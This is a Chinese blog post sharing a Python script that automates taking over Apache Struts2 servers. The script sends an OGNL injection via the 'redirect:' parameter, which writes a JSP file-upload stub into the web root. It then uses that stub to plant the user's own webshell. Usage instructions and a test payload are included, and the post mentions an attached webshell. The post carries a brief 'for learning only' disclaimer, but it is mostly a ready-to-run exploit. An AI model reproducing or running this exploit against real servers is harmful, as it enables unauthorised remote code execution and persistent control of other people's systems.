之前在看PHP,要给协会写一个CTF,偶然看到乌云上发的最新struts2漏洞以及getshell,jsp我基本上也看不懂。折腾了一下,发现挺有意思,于是写一个python的脚本来自动化getshell吧~
……不知不觉已经快3点了……
#coding : utf-8 __author__ = 'Phtih0n' import requests, sys, urllib headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'} def GetHost(url): (type, rest) = urllib.splittype(url) (host, rest) = urllib.splithost(rest) return (type + "://" + host + "/") def UpData(url): ma = file("shell.jsp") str = ma.read() param = {} param['f'] = 'bakup.jsp' param['t'] = str r = requests.post(url + "phithon.jsp", data=param, headers=headers) r = requests.get(url + param['f'], headers=headers, allow_redirects=False) if 200 == r.status_code: print "success" print "shell : " + url + param['f'] else: print "fail" def GetShell(url): test = url + r'''/Struts2/test.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22phithon.jsp%22).replaceAll("\\", "/"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e''' r = requests.get(test, headers = headers ) url = GetHost(url) r = requests.get(url + "phithon.jsp", headers = headers) if r.status_code == 200: UpData(url) else: print "fail" try: url = sys.argv[1] except: print "usage : %s url" % sys.argv[0] GetShell(url) #/Struts2/test.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[phithon]'),%23w.flush(),%23w.close()}
使用条件及方法:
1.python安装requests库,此处有安装方法:https://www.leavesongs.com/PYTHON/PythonGetLink.html
2.将自己的jsp webshell改名为”shell.jsp”,放在同一个目录下
3.使用方法:UseOfStruts.py http://xxxx/ 即可:
一般jsp权限挺大的,只要拿到webshell,一般就是管理员之类的:
不多说了,大家继续发挥折腾吧~我睡了……
我把源文件及我使用的jsp webshell打包发附件了。
最后说明,代码只用作学习,请不要作为攻击手段测试国内网站。
附件:
偶然在看知道创宇黑客技能表,里面的知识很全,于是发现了这个xss平台,类似于ctf,不过只针对xss这个类别,下面将详细的解题方法写出来,比较适合刚学xss的小白,大牛绕过~(文末有彩蛋) 题目地址:传送门 第一关: 直接输入<script>ale…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册